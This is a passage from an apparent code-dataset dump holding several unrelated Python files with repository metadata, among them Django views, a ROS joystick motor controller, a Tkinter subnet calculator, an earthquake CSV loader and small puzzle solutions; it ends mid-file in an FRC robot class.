arguments[\"--farmId\"]\n\n today = datetime.date.today()\n targetDate = today + datetime.timedelta(days=day)\n\n predictX = pandas.DataFrame(\n [\n [\n lengthMinutes,\n targetDate.year,\n targetDate.month,\n targetDate.day,\n farmableLandId\n ]\n ],\n columns=[\n 'lengthMinutes', 'year', 'month', 'day', 'FarmableLandId'\n ]\n )\n\n try:\n prediction = [0]\n if isinstance(estimator['pipeline_estimator'], Pipeline):\n prediction = estimator['pipeline_estimator'].predict(\n predictX\n )\n elif isinstance(estimator['pipeline_estimator'], ARIMAResultsWrapper):\n prediction = estimator['pipeline_estimator'].predict(\n start=0,\n end=0\n )\n prediction = prediction.to_numpy()\n except:\n pass\n\n irrigatePrediction = IrrigatePredictions(\n date=targetDate,\n lengthMinutes=lengthMinutes,\n amountWater=round(prediction[0], 2),\n FarmableLandId=farmableLandId\n )\n\n stmtIrrigatePrediction = select(IrrigatePredictions).where(\n IrrigatePredictions.date == targetDate,\n IrrigatePredictions.FarmableLandId == farmableLandId\n )\n ip = session.scalars(stmtIrrigatePrediction).first()\n\n if not ip:\n session.add(irrigatePrediction)\n else:\n pass\n\nsession.flush()\nsession.commit()\n","repo_name":"guilogar/tfm","sub_path":"predictions/predictions_irrigate.py","file_name":"predictions_irrigate.py","file_ext":"py","file_size_in_byte":4903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27224829917","text":"import turtle\n\n# Setup\nscreen = turtle.Screen()\nscreen.bgcolor(\"black\")\npen = turtle.Turtle()\npen.speed(0)\npen.pensize(2)\ncolors = [\"red\", \"orange\", \"yellow\", \"green\", \"blue\", \"purple\"]\n\n# Art\nfor _ 
in range(1000):\n pen.color(colors[_ % len(colors)])\n pen.forward(_)\n pen.right(59)\n\n# Hide the turtle\npen.hideturtle()\n\n# Exit on click\nturtle.done()\n","repo_name":"chimpastic/turtle","sub_path":"hexgon_23-05-2023.py","file_name":"hexgon_23-05-2023.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1198902248","text":"#!/usr/bin/env python3\n\"\"\"\nday6: part1.py - pretty clear when need a tree data structure to represent\n the data. Building a Node class with the parent (only one) and the\n children (possibly more than one).\n\n Also building a dictionary of all heavenly bodies so that I can locate\n one easily and then walk the path to COM via parent links/pointers or\n discover children via children array.\n\"\"\"\n\n\nclass Node:\n def __init__(self, value):\n self.value = value\n self.children = []\n self.parent = None\n\n def add(self, child):\n self.children.append(child)\n child.parent = self\n\n\ndef print_tree(bodies, top='COM', indent=''):\n root = bodies[top]\n print('{0}:{1}'.format(indent, top), len(root.children))\n i = 0\n for k in root.children:\n i = i + 1\n print_tree(bodies, top=k.value, indent=i)\n\n\ndef count_orbits(bodies):\n # Count the orbits\n orbits = 0\n\n for b in bodies:\n p = bodies[b].parent\n while(p is not None):\n orbits = orbits + 1\n p = p.parent\n\n return orbits\n\n\ndef build_bodies(entries):\n bodies = {}\n\n for entry in entries:\n body, moon = entry.rstrip().split(')')\n\n # We've not seen the parent body before\n if body not in bodies:\n b = Node(body)\n bodies[body] = b\n else:\n b = bodies[body]\n\n # We've not seen the moon before\n if moon not in bodies:\n m = Node(moon)\n bodies[moon] = m\n else:\n m = bodies[moon]\n\n b.add(m)\n\n return bodies\n\n\nif __name__ == '__main__':\n\n with open('part1.txt', 'r') as f:\n entries = f.readlines()\n\n bodies = build_bodies(entries)\n\n orbits = count_orbits(bodies)\n print('Total direct and indirect orbits: {0}'.format(orbits))\n","repo_name":"broadcaststorm/advent-of-code","sub_path":"2019/06/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":1841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36322840250","text":"from django.conf import settings\nfrom django.contrib.contenttypes.models import ContentType\n\nfrom catalogue.utils import CeceApiClient\nfrom catalogue.utils import CommandWrapper\nfrom catalogue.models import (\n Certificate,\n)\n\n\ndef create_or_update_certificates(logger, cmd_name, client, recursive=True):\n fn = \"create_or_update_certificates\"\n client.set_cece_token_headers(logger)\n\n # Retrieve the (paginated) data\n uri = settings.CECE_API_URI + \"mancelot/catalog/certificate/\"\n logger.debug(\"{0}: GET {1} <-- recursive = {2}\".format(fn, uri, recursive))\n data = client.get_list(logger, uri, recursive=recursive)\n logger.debug(\"{0}: received {1} certificates\".format(fn, len(data)))\n\n # Iterate through the Cece data\n for i, c in enumerate(data):\n logger.debug(\"\\n{0} / {1}\".format(i + 1, len(data)))\n\n # Get or create Certificate. 
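# Plain-Python analogue of the get_or_create contract used just below; the
# dict-backed helper is illustrative only and not part of this plugin:
def _get_or_create(store, key, default):
    # mirrors Django's QuerySet.get_or_create: returns (value, created)
    if key in store:
        return store[key], False
    store[key] = default
    return store[key], True

_demo = {}
_cert, _created = _get_or_create(_demo, "GOTS", {"info": ""})
assert _created is True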
Match on **name** only!\n certificate, created = Certificate.objects.get_or_create(\n name=c[\"name\"],\n )\n logger.debug(\n \"{0} Certificate: {1}\".format(\"Created\" if created else \"Have\", certificate)\n )\n\n # Overwrite all fields\n certificate.info = c[\"about\"]\n certificate.cece_api_url = \"{0}{1}/\".format(uri, c[\"id\"])\n certificate.save()\n\n\nclass Command(CommandWrapper):\n help = (\n \"\\033[91mUpdate Certificates with Cece data, overwriting all fields!\\033[0m\\n\"\n )\n\n def handle(self, *args, **options):\n client = CeceApiClient()\n self.cmd_name = __file__.split(\"/\")[-1].replace(\".py\", \"\")\n self.method = create_or_update_certificates\n self.margs = [self.cmd_name, client]\n self.mkwargs = {\"recursive\": not settings.DEBUG}\n\n super().handle(*args, **options)\n","repo_name":"tlrh314/mancelot","sub_path":"backend/apps/catalogue/management/commands/retrieve_certificates_from_cece.py","file_name":"retrieve_certificates_from_cece.py","file_ext":"py","file_size_in_byte":1764,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"1571870748","text":"from django.shortcuts import render, redirect\r\nfrom django.contrib import messages\r\nfrom django.contrib.messages import constants\r\nfrom django.contrib.auth import authenticate, login, logout\r\nfrom .forms import MyUserCreationForm, MyUserLoginForm, MyUserUpdateForm\r\nfrom .decorators import login_forbidden\r\nfrom .models import User\r\nfrom chat.models import Topic\r\nfrom django.contrib.auth.decorators import login_required\r\nfrom django.shortcuts import get_object_or_404\r\n\r\n\r\n@login_forbidden\r\ndef registerUser(request):\r\n form = MyUserCreationForm()\r\n if request.method == 'POST':\r\n form = MyUserCreationForm(request.POST)\r\n if form.is_valid():\r\n email = form.cleaned_data.get('email')\r\n if User.objects.filter(email=email).exists():\r\n messages.add_message(request, constants.ERROR, \"Email already registered\")\r\n\r\n user = form.save(commit=False)\r\n user.username = user.username.lower()\r\n user.backend = 'register.backends.EmailBackend'\r\n user.save()\r\n login(request, user)\r\n return redirect('home')\r\n\r\n return render(request, 'signup.html', context={'form': form, 'messages': messages.get_messages(request)})\r\n\r\n\r\n@login_forbidden\r\ndef loginUser(request):\r\n form = MyUserLoginForm()\r\n message = ''\r\n if request.method == 'POST':\r\n form = MyUserLoginForm(request.POST)\r\n if form.is_valid():\r\n user = authenticate(\r\n email = form.cleaned_data['email'],\r\n password = form.cleaned_data['password']\r\n )\r\n if user is not None:\r\n login(request, user)\r\n message = f'Hello {user.username}! 
You have been logged in!'\r\n return redirect('home')\r\n else:\r\n message = 'login failed!'\r\n return render(request, 'login.html', context={'form':form, 'message': message})\r\n\r\n\r\ndef logoutUser(request):\r\n logout(request)\r\n return redirect('login')\r\n\r\n@login_required\r\ndef userProfile(request, pk):\r\n user = User.objects.get(id=pk)\r\n rooms = user.room_set.all()\r\n room_messages = user.message_set.all()\r\n avatar_url = user.avatar if user.avatar else None\r\n topics = Topic.objects.all()\r\n context = {\r\n 'user': user, \r\n 'rooms':rooms, \r\n 'topics': topics,\r\n 'room_messages': room_messages,\r\n 'avatar_url': avatar_url,\r\n }\r\n return render(request, 'profile.html', context)\r\n\r\n\r\n@login_required\r\ndef updateUser(request, pk):\r\n user = request.user\r\n form = MyUserUpdateForm(instance=user)\r\n \r\n if request.method == 'POST':\r\n form = MyUserUpdateForm(request.POST, request.FILES, instance=user)\r\n if form.is_valid():\r\n form.save()\r\n return redirect('user_profile', pk= user.id)\r\n return render(request, 'update_user.html', {'form':form})","repo_name":"caioedu1/FinWise","sub_path":"register/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23543949581","text":"for t in range(int(input())):\n\tS, K = input().split()\n\tS = [x == '+' for x in S]\n\tK = int(K)\n\tr = 0\n\tfor i in range(len(S) - K + 1):\n\t\tif not S[i]:\n\t\t\tfor j in range(i, i + K):\n\t\t\t\tS[j] ^= True\n\t\t\tr += 1\n\tif not all(S[1-K:]):\n\t\tr = 'IMPOSSIBLE'\n\tprint(\"Case #{}: {}\".format(t + 1, r))","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_199/2608.py","file_name":"2608.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4029121192","text":"from tda_tabla_hash import crear_tabla, agregar_tc, hash_diccionario,buscar_tc, agregar_ta, buscar_ta\r\nfrom tda_lista import barrido\r\n\r\nclass Palabra(object):\r\n \r\n def __init__(self,palabra,significado):\r\n self.palabra = palabra\r\n self.significado = significado\r\n \r\n def __str__(self):\r\n \r\n return self.palabra.capitalize() + \". 
Significado : \" + self.significado.capitalize()\r\n\r\n# a b c d e f g h i j k l m n o p q r s t u v w x y z \r\n# 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26\r\n\r\npalabra1 = Palabra(\"a\",\"letra\")\r\npalabra2 = Palabra(\"b\",\"letra\")\r\npalabra3 = Palabra(\"aa\",\"letra\")\r\npalabra4 = Palabra(\"aaa\",\"letra\")\r\n\r\ndiccionario = crear_tabla(26)\r\ndiccionario2 = crear_tabla(26)\r\n'''\r\na = hash_diccionario(palabra1,diccionario)\r\nb = hash_diccionario(palabra2,diccionario)\r\nc = hash_diccionario(palabra3,diccionario)\r\nd = hash_diccionario(palabra4,diccionario)\r\n\r\nprint(a)\r\nprint(b)\r\nprint(c)\r\nprint(d)\r\n'''\r\nagregar_ta(diccionario2,hash_diccionario,palabra1,\"palabra\")\r\nagregar_ta(diccionario2,hash_diccionario,palabra2,\"palabra\")\r\nagregar_ta(diccionario2,hash_diccionario,palabra3,\"palabra\")\r\nagregar_ta(diccionario2,hash_diccionario,palabra4,\"palabra\")\r\n\r\n\r\ncont = 0 \r\nfor e in diccionario2:\r\n print(cont)\r\n if e:\r\n aux = e.inicio\r\n while aux:\r\n print(aux.info)\r\n aux = aux.sig\r\n cont += 1\r\n \r\nbuscado = buscar_ta(diccionario2,hash_diccionario,palabra1,\"palabra\")\r\nprint(buscado.info)\r\n\r\n\r\n\r\n","repo_name":"JuanInhale/Algoritmos-2020","sub_path":"hash_ej1.py","file_name":"hash_ej1.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74123414594","text":"if __name__ =='__main__':\n import sys\n sym=sys.ps1\n symbol=sys.ps2\n\n \"\"\"\n 1)The variable sys.path is a list of strings that \n determines the interpreter’s search path for modules;\n output_formatting_1)It is initialized to a default path taken from the environment \n variable PYTHONPATH, or from a built-in default if PYTHONPATH is not set;\n 3)You can modify it using standard list operations:\n \n \"\"\"\n # sys.path.append('D:\\\\Pycharm\\\\Workspace\\\\git_operation\\\\standard_module5.py')","repo_name":"HolyQuar/git_operation","sub_path":"python_operation/modules_operation_3/standard_modules5.py","file_name":"standard_modules5.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31833079676","text":"import turtle\n\n\nclass Mob(turtle.Turtle):\n _algorythm = 'greedy'\n\n def __init__(self, coord=(0, 0), name='Frog', img='frog.gif',\n speed=15):\n super().__init__()\n # scr = turtle.Screen()\n # scr.register_shape(shape='./frog.gif', name='frog')\n self.shape(name='turtle')\n self.penup()\n self.coord = list(coord)\n self.goto(coord)\n self.speed = speed\n self.name = name\n\n def move(self):\n self.goto(self.coord)\n\n def step(self, direction='up'):\n if direction == 'up':\n self.coord[1] += self.speed\n if direction == 'down':\n self.coord[1] -= self.speed\n if direction == 'left':\n self.coord[0] -= self.speed\n if direction == 'right':\n self.coord[0] += self.speed\n self.move()\n return self.coord\n\n def set_coord(self, coord):\n self.coord = list(coord)\n","repo_name":"kit8nino/2023-python","sub_path":"_4/mob.py","file_name":"mob.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"12498516372","text":"#!/usr/bin/env python3\n# Decription:\n# This program takes user input commands from the \n# external controller, and moves the ROSPerch as such.\n# Adapted Sources:\n# Motor command code is adapted from the UTAP 2020\n# 
code at https://github.com/jdicecco/UTAP/\n# Joystick control code is based on code released \n# by rdb under the Unlicense (unlicense.org)\n# Based on information from:\n# https://www.kernel.org/doc/Documentation/input/joystick-api.txt\n# License:\n# Software License Agreement (BSD License)\n# Find the full agreement at https://github.com/mxdrew/ROSPerch/blob/master/LICENSE\n\n# Imports the necessary libraries\nimport time\nimport math\nimport board\nimport busio\nimport adafruit_pca9685\nimport subprocess\nimport os, sys, struct, array\nfrom fcntl import ioctl\nimport RPi.GPIO as GPIO\n\n# I2C address for the PWM driver board retrieved automatically\ni2c_pwm = board.I2C()\npwm = adafruit_pca9685.PCA9685(i2c_pwm)\npwm.frequency = 1600\n\n#### CONFIGURE THE RPI TO INTERFACE WITH CONTROL BOARD ####\n\n# Make it easier to remember which pins control which motors\nGR1 = 19\nGR2 = 21\nBL1 = 13\nBL2 = 26\nOR1 = 20\nBR1 = 27\n\n\n# Do the same for the corresponding PWM signals\nGR1_PWM = 1\nGR2_PWM = 5\nBL1_PWM = 3\nBL2_PWM = 6\nOR1_PWM = 0\nBR1_PWM = 2\n\n\n# Use the numbering scheme for the Broadcom chip, not the RPi pin numbers\nGPIO.setmode(GPIO.BCM)\n\n# Turn off warnings about pins being already configured\nGPIO.setwarnings(False)\n\n\n# Setup pins to control direction on the motor driver chip (MAXIM's MAX14870)\nGPIO.setup(GR1,GPIO.OUT) # Green 1\nGPIO.setup(GR2,GPIO.OUT) # Green 2\nGPIO.setup(BL1,GPIO.OUT) # Blue 1\nGPIO.setup(BL2,GPIO.OUT) # Blue 2\nGPIO.setup(OR1,GPIO.OUT) # Orange 1\nGPIO.setup(BR1,GPIO.OUT) # Brown 1\n\n\n# Status LEDs\nGPIO.setup(6,GPIO.OUT)\nGPIO.setup(16,GPIO.OUT)\n\n\n# Based on code released by rdb under the Unlicense (unlicense.org)\n# Based on information from:\n# https://www.kernel.org/doc/Documentation/input/joystick-api.txt\n\n# Find the joystick device(s)\nprint('Available devices:')\n\n# Need to check to make sure a joystick has been connected before we proceed\n# if not, we'll just wait here until someone connects a joystick.\n\n# This is usually called a flag and is used to check a condition\n# when the desired condition is met, we change the value of the flag.\njoy_not_found = 1\n\nwhile joy_not_found:\n for fn in os.listdir('/dev/input'):\n if fn.startswith('js'):\n print(' /dev/input/%s' % (fn))\n joy_not_found = 0\n\n\n# We'll store the states of the axes and buttons\naxis_states = {}\nbutton_states = {}\n\n# These constants were borrowed and modified from linux/input.h\naxis_names = {\n 0x00 : 'x',\n 0x01 : 'y',\n 0x02 : 'rx',\n 0x03 : 'x2',\n 0x04 : 'y2',\n 0x05 : 'ry',\n 0x10 : 'hat0x',\n 0x11 : 'hat0y',\n}\n\nbutton_names = {\n 0x130 : 'a',\n 0x131 : 'b',\n 0x133 : 'x',\n 0x134 : 'y',\n 0x136 : 'LB',\n 0x137 : 'RB',\n 0x13a : 'select',\n 0x13b : 'start',\n 0x13c : 'mode',\n 0x13d : 'thumbl',\n 0x13e : 'thumbr',\n}\n\naxis_map = []\nbutton_map = []\n\n# Open the joystick device.\nfn = '/dev/input/js0'\nprint('Opening %s...' 
% fn)\njsdev = open(fn, 'rb')\n\n# Get the device name.\n#buf = bytearray(63)\nbuf = array.array('B', [0] * 64)\nioctl(jsdev, 0x80006a13 + (0x10000 * len(buf)), buf) # JSIOCGNAME(len)\njs_name = buf.tobytes().rstrip(b'\\x00').decode('utf-8')\nprint('Device name: %s' % js_name)\n\n# Get number of axes and buttons.\nbuf = array.array('B', [0])\nioctl(jsdev, 0x80016a11, buf) # JSIOCGAXES\nnum_axes = buf[0]\n\nbuf = array.array('B', [0])\nioctl(jsdev, 0x80016a12, buf) # JSIOCGBUTTONS\nnum_buttons = buf[0]\n\n# Get the axis map.\nbuf = array.array('B', [0] * 0x40)\nioctl(jsdev, 0x80406a32, buf) # JSIOCGAXMAP\n\nfor axis in buf[:num_axes]:\n axis_name = axis_names.get(axis, 'unknown(0x%02x)' % axis)\n axis_map.append(axis_name)\n axis_states[axis_name] = 0.0\n\n# Get the button map.\nbuf = array.array('H', [0] * 200)\nioctl(jsdev, 0x80406a34, buf) # JSIOCGBTNMAP\n\nfor btn in buf[:num_buttons]:\n btn_name = button_names.get(btn, 'unknown(0x%03x)' % btn)\n button_map.append(btn_name)\n button_states[btn_name] = 0\n\nprint(('%d axes found: %s' % (num_axes, ', '.join(axis_map))))\nprint(('%d buttons found: %s' % (num_buttons, ', '.join(button_map))))\n\n# Declare variables for use later\n# These will be the values from the right joystick\nintValx2 = 0\nintValy2 = 0\n\n# These will be the values from the left joystick\nintValx = 0\nintValy = 0\n\n# These will be the values from the two triggers in the front of the joystick\nintValrx = 0\nintValry = 0\n\n# A TRY-CATCH in programming allows a program to fail gracefully if the \"try\" portion\n# cannot be executed.\ntry:\n\n # Main event loop\n while True:\n\n # Joystick code based on release by rdb under the Unlicense (unlicense.org)\n # Based on information from:\n # https://www.kernel.org/doc/Documentation/input/joystick-api.txt\n\n evbuf = jsdev.read(8)\n if evbuf:\n tyme, value, type, number = struct.unpack('IhBB', evbuf)\n\n # Use for debugging\n #if type & 0x80:\n #print(\"(initial)\",end=\"\"),\n\n if type & 0x01:\n button = button_map[number]\n if button:\n button_states[button] = value\n # Use \"PRINT\" for debugging - comment out to speed program execution\n if value:\n print(\"%s pressed\" % (button))\n else:\n print(\"%s released\" % (button))\n if button == \"y\":\n GPIO.output(6,GPIO.HIGH)#turn on other LED\n else:\n GPIO.output(6,GPIO.LOW)#otherwise turn it off - should turn off when any other button is pushed\n if button == \"x\":\n GPIO.output(GR2,GPIO.HIGH)\n GPIO.output(BL2,GPIO.HIGH)\n pwm.channels[GR2_PWM].duty_cycle = 0xFFFF\n pwm.channels[BL2_PWM].duty_cycle = 0xFFFF\n GPIO.output(16,GPIO.HIGH)\n else:\n GPIO.output(GR2,GPIO.LOW)\n GPIO.output(BL2,GPIO.LOW)\n pwm.channels[GR2_PWM].duty_cycle = 0\n pwm.channels[BL2_PWM].duty_cycle = 0\n GPIO.output(16,GPIO.LOW)\n if type & 0x02:\n axis = axis_map[number]\n #right joystick fwd/rev\n if axis==\"y2\":\n fvalue = value\n axis_states[axis] = fvalue\n intValy2 = int(fvalue)*2+1\n # Use \"PRINT\" for debugging, comment out to speed program\n print(\"%d\" % (intValy2))\n # Right joystick left/right\n if axis==\"x2\":\n fvalue = value\n axis_states[axis] = fvalue\n intValx2 = int(fvalue)*2+1\n # Left joystick fwd/rev\n if axis==\"y\":\n fvalue = value\n axis_states[axis] = fvalue\n intValy = int(fvalue)*2+1\n # Left joystick left/right\n if axis==\"x\":\n fvalue = value\n axis_states[axis] = fvalue\n intValx = int(fvalue)*2+1\n # Front right trigger fwd (vehicle ascend)\n if axis==\"ry\":\n fvalue = value\n axis_states[axis] = fvalue\n intValry = int(fvalue)*2+1\n # Front left trigger rev 
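# Each event read from /dev/input/js* is 8 bytes: u32 timestamp (ms),
# s16 value, u8 type, u8 number. That is exactly what the
# struct.unpack('IhBB', evbuf) call above decodes. A self-contained check
# against a fabricated event buffer:
import struct
fake_event = struct.pack('IhBB', 1234, -32767, 0x02, 1)  # axis 1, full deflection
t_ms, value, ev_type, number = struct.unpack('IhBB', fake_event)
assert (ev_type & 0x02) and number == 1 and value == -32767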
(vehicle descend)\n if axis==\"rx\":\n fvalue = value\n axis_states[axis] = fvalue\n intValrx = int(fvalue)*2+1\n\n # There's a nice tutorial for single joysick control at http://home.kendra.com/mauser/Joystick.html\n if intValy2<-100:\n\n GPIO.output(GR1,GPIO.LOW) # Direction pin\n pwm.channels[GR1_PWM].duty_cycle = abs(intValy2)\n\n elif intValy2>100:\n\n GPIO.output(GR1,GPIO.HIGH) # Direction pin\n pwm.channels[GR1_PWM].duty_cycle = (intValy2)\n\n else:\n pwm.channels[GR1_PWM].duty_cycle = 0\n\n if intValy>100:\n GPIO.output(BL1,GPIO.HIGH)#direction pin\n pwm.channels[BL1_PWM].duty_cycle = (intValy)\n\n elif intValy<-100:\n GPIO.output(BL1,GPIO.LOW)#direction pin\n pwm.channels[BL1_PWM].duty_cycle = abs(intValy)\n\n else:\n pwm.channels[BL1_PWM].duty_cycle = 0\n\n if intValrx>100:\n GPIO.output(OR1,GPIO.LOW)#direction pin\n GPIO.output(BR1,GPIO.LOW)#direction pin\n pwm.channels[OR1_PWM].duty_cycle = abs(intValrx)\n pwm.channels[BR1_PWM].duty_cycle = abs(intValrx)\n\n elif intValry>100:\n GPIO.output(OR1,GPIO.HIGH)#direction pin\n GPIO.output(BR1,GPIO.HIGH)#direction pin\n pwm.channels[OR1_PWM].duty_cycle = abs(intValry)\n pwm.channels[BR1_PWM].duty_cycle = abs(intValry)\n\n else:\n pwm.channels[OR1_PWM].duty_cycle = 0\n pwm.channels[BR1_PWM].duty_cycle = 0\n\nexcept (KeyboardInterrupt,SystemExit):\n pwm.channels[OR1_PWM].duty_cycle = 0\n pwm.channels[BR1_PWM].duty_cycle = 0\n pwm.channels[BL1_PWM].duty_cycle = 0\n pwm.channels[GR1_PWM].duty_cycle = 0\n GPIO.output(6,GPIO.LOW)\n GPIO.output(16,GPIO.LOW)\n GPIO.cleanup()","repo_name":"mxdrew/ROSPerch","sub_path":"rosperch/scripts/joy_controller.py","file_name":"joy_controller.py","file_ext":"py","file_size_in_byte":9759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14883863055","text":"import logging\n\nclass Parameter(object):\n \"\"\"\n Generic handler for parameters stored in configuration files\n\n Attributes:\n parameters dictionary containing the value for configuration parameters\n default_parameters dictionary containung default values for parameters\n \"\"\"\n def __init__(self, parameter_filename):\n self.parameters = {}\n self.default_parameters = {}\n if parameter_filename is None:\n logging.warning(\"No parameter file provided; using default parameters\")\n else:\n logging.info(\"Extract parameters from file {}\".format(parameter_filename))\n self.load_parameter_file(parameter_filename)\n\n def load_parameter_file(self, parameter_filename):\n with open(parameter_filename) as f:\n for line in f.readlines():\n # Ignore comments\n if line.startswith(\"#\"):\n continue\n\n try:\n # Also get rid of trailing characters\n key, value = line.strip().split(\":\")\n if key in self.parameters:\n if not isinstance(self.parameters[key], list):\n self.parameters[key] = [self.parameters[key]]\n self.parameters[key].append(value)\n else:\n self.parameters[key] = value\n except ValueError as e:\n logging.warning(\n \"Got error '{}' for line '{}'; ignore it\".format(e, line))\n\n def get(self, key):\n \"\"\"\n Get the value of the parameter with key `key`.\n If not defined by the configuration file, return the default value.\n Raise Exception if the parameter has no default value and is absent.\n \"\"\"\n val = self.parameters.get(key)\n if val is None:\n if key in self.default_parameters:\n return self.default_parameters[key]\n else:\n raise Exception(\"Parameter not found \" + key)\n else:\n return val\n\n def __str__(self):\n return 
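# Stand-alone sketch of the repeated-key behaviour implemented in
# load_parameter_file above: the first occurrence stays a scalar, later
# occurrences promote the entry to a list (keys/values invented here):
params = {}
for key, value in [("iface", "eth0"), ("iface", "eth1"), ("delay", "5ms")]:
    if key in params:
        if not isinstance(params[key], list):
            params[key] = [params[key]]
        params[key].append(value)
    else:
        params[key] = value
assert params == {"iface": ["eth0", "eth1"], "delay": "5ms"}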
self.parameters.__str__()\n","repo_name":"qdeconinck/minitopo","sub_path":"core/parameter.py","file_name":"parameter.py","file_ext":"py","file_size_in_byte":2171,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"61"} +{"seq_id":"7440904681","text":"from collections import namedtuple\nimport pandas as pd\nimport sqlite3\n\n\"\"\" \nData types and any add'l metadata from: \nhttp://earthquake.usgs.gov/earthquakes/feed/v1.0/glossary.php \n\"\"\"\n\ndef get_db(db_name):\n \"\"\" \n Create a DB connection to the table passed in by db_name. \n Returns a namedtuple containing the connection object and the DB cursor.\n \"\"\"\n db_conn_mgr = namedtuple('db_conn_mgr', ['conn', 'cursor'])\n conn = sqlite3.connect(db_name)\n cursor = conn.cursor()\n return db_conn_mgr(conn, cursor)\n\ndef create_eq_table(csv_file, db_location):\n dataframe = pd.read_csv(csv_file)\n db = get_db(db_location)\n # Careful! This will replace an existing db.\n dataframe.to_sql('all_earthquakes', db.conn, if_exists='replace', index=False)\n","repo_name":"joedougherty/earthquake_etl","sub_path":"eq_database.py","file_name":"eq_database.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11098503125","text":"from datetime import datetime, timedelta\nfrom os import environ\nfrom time import mktime\n\nfrom google.appengine.ext import ndb\n\n\nDEBUG = ('Development' in environ.get('SERVER_SOFTWARE', 'Production'))\n\n\ndef datetime_to_millis(dt):\n return int(mktime(dt.utctimetuple())) * 1000\n\n\ndef millis_to_datetime(value):\n seconds = int(value/1000.0)\n dt = datetime.utcfromtimestamp(seconds) + timedelta(milliseconds=int(value)-seconds*1000)\n return dt\n\n\ndef future_iterator(futures):\n while futures:\n if len(futures) == 1:\n future = futures[0]\n else:\n future = ndb.Future.wait_any(futures)\n futures.remove(future)\n yield future\n","repo_name":"jairajs89/starter-kit-appengine","sub_path":"lib/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42238233701","text":"# Title: Subnet Calculator: Subnet Calculator GUI\r\n# Date: 04-04-2017\r\n\r\n\r\nfrom SubnetCalculator.GenSubnetCalcGUI import GenSubnetCalcGUI\r\nfrom SubnetCalculator.CIDRCalcGUI import CIDRCalcGUI\r\nfrom SubnetCalculator.NetCalcGUI import NetCalcGUI\r\nfrom SubnetCalculator.NetmaskCalcGUI import NetmaskCalcGUI\r\nfrom SubnetCalculator.BroadcastCalcGUI import BroadcastCalcGUI\r\nfrom SubnetCalculator.IPRangeCalcGUI import IPRangeCalcGUI\r\nfrom SubnetCalculator.TotalHostCalcGUI import TotalHostCalcGUI\r\nfrom SubnetCalculator.AssignableHostCountCalcGUI import AssignHostCalcGUI\r\nfrom tkinter import Tk\r\nfrom tkinter import Button\r\n\r\n\r\nclass SubnetCalculatorGUI:\r\n def __init__(self):\r\n self.calculator = Tk()\r\n self.calculator.wm_title('Subnet Calculator')\r\n self.general_calculator = Button(self.calculator, text='General Subnet Calculator', width=50,\r\n command=lambda: GenSubnetCalcGUI().generate_main())\r\n self.cidr_calculator = Button(self.calculator, text='CIDR Calculator', width=50,\r\n command=lambda: CIDRCalcGUI().generate_main())\r\n self.network_address_calculator = Button(self.calculator, text='Network Address Calculator', width=50,\r\n command=lambda: NetCalcGUI().generate_main())\r\n self.netmask_calculator = Button(self.calculator, text='Netmask 
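# Hedged aside on the get_db helper shown earlier: bundling the connection
# and cursor in a namedtuple gives dot-access to both. A self-contained demo
# against an in-memory SQLite database (table name invented):
import sqlite3
from collections import namedtuple

DB = namedtuple('DB', ['conn', 'cursor'])
_conn = sqlite3.connect(':memory:')
db = DB(_conn, _conn.cursor())
db.cursor.execute('CREATE TABLE quakes (mag REAL)')
db.conn.commit()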
Calculator', width=50,\r\n command=lambda: NetmaskCalcGUI().generate_main())\r\n self.broadcast_address_calculator = Button(self.calculator, text='Broadcast Address Calculator', width=50,\r\n command=lambda: BroadcastCalcGUI().generate_main())\r\n self.ip_range_calculator = Button(self.calculator, text='Assignable IP Range Calculator', width=50,\r\n command=lambda: IPRangeCalcGUI().generate_main())\r\n self.total_host_calculator = Button(self.calculator, text='Total Host Count Calculator', width=50,\r\n command=lambda: TotalHostCalcGUI().generate_main())\r\n self.assignable_host_calculator = Button(self.calculator, text='Assignable Host Count Calculator', width=50,\r\n command=lambda: AssignHostCalcGUI().generate_main())\r\n\r\n self.general_calculator.pack()\r\n self.cidr_calculator.pack()\r\n self.network_address_calculator.pack()\r\n self.netmask_calculator.pack()\r\n self.broadcast_address_calculator.pack()\r\n self.ip_range_calculator.pack()\r\n self.total_host_calculator.pack()\r\n self.assignable_host_calculator.pack()\r\n\r\n self.calculator.mainloop()\r\n","repo_name":"dwitt006/SubnetCalculator","sub_path":"SubnetCalculator/SubnetCalculatorGUI.py","file_name":"SubnetCalculatorGUI.py","file_ext":"py","file_size_in_byte":2777,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"34453064289","text":"import wpilib\nimport ctre\n\nclass S_1:\n def __init__(self, robot, ):\n self.robot = robot\n\n self.has_crossed_line = False\n self.has_turned = False\n self.has_arrived = False\n self.has_shot = False\n self.inicial_state = self.robot.right_drivetrain_motor.getSelectedSensorPosition()\n 